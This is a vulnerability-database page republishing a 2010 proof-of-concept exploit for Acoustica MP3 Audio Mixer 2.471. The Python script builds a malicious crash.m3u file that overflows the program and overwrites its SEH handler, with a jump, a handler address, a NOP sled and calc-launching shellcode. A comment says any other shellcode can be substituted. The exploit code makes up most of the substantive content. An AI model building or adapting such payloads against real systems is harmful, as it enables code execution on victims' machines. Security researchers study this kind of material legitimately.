Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 55 Views

Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH vulnerabilit

Code

                                                # Exploit Title: Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH
# Date: September 8 2010
# Author: Carlos Hollmann 
# Software Link: http://www.acoustica.com/downloading.asp?p=1
# Version: 2.471
# Tested on: Windows xp sp3 running on VMware Fusion 3.1 and VirtualBox 3.2.8
# CVE : 


#    ________  _    _________   ____ __ _____   ________
#   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
#  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __  
# / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ /  
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/   

# COLOMBIA presents.............
#        PoC from  D3V!L FucK3r http://www.exploit-db.com/exploits/9213/
#
#	Carlos Mario Penagos Hollmann A.K.A Elvenking  [email protected]
#	Extended M3U directives

# 	Background from http://hanna.pyxidis.org/tech/m3u.html


 
#	The software doesn't  handle correctly M3U's header and extra info when is being imported on a open sound group.
# 	Trigger: launch app, open an existing sound group i.e(C:\Program Files\Acoustica MP3 Audio Mixer\example.sgp) then import the crash.m3u and....KaaaaBooom!!
#
#     
#     Greetings: My Family, Algeria-->sud0 Australia--> tecr0c,Peru-->fataku,Spain-->Alberto Hervalejo, OFFSEC TEAM and all my friends in Colombia 
#	!!! PAZ PARA MI PAIS PAZ PARA COLOMBIA !!! Freedom!!
	



# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# I do not want anyone to use this script
# for malicious and/or illegal purposes
# I cannot be held responsible for any illegal use.
 
# Note : you are not allowed to edit/modify this code. 
# If you do, I will not be held responsible for any damages this may cause.

#!/usr/bin/python


magic 	= "crash.m3u"


vuln 	= "\x23\x0D\x0A\x23\x0D\x0A" # Extended M3U, no EXTM3U, no EXTINFO , can change OD for any  value \x1b,\x0a.........


junk 		=	"\x41" * 816
ds_eax 		=	"\x25\x25\x47\x7E" #First Call ds:[eax+8], Writeable memory address to put in EAX
morejunk 	=	"\x42" * 8308
nSEH 		=	"\xEB\x06\x90\x90" #short jmp 6 bytes 
SEH 		=	"\x3F\x28\xD1\x72"#SEH Handler
nops 		=	"\x90" * 10 #landing padd
shellcode	=	"\x8b\xec\x55\x8b\xec\x68\x20\x20\x20\x2f\x68\x63\x61\x6c\x63\x8d\x45\xf8\x50\xb8\xc7\x93\xc2\x77\xff\xd0" # Thanks  sud0, any other shell works too  just remove "\x00\x0a"
payload	=	vuln+junk+ds_eax+morejunk+nSEH+SEH+nops+shellcode

file = open(magic , 'w')
file.write(payload)
file.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
exploitacoustica mp3 audio mixerwindows xp sp3vmware fusionvirtualboxcolombiapocm3u directivesseh vulnerabilityshellcodepayload
55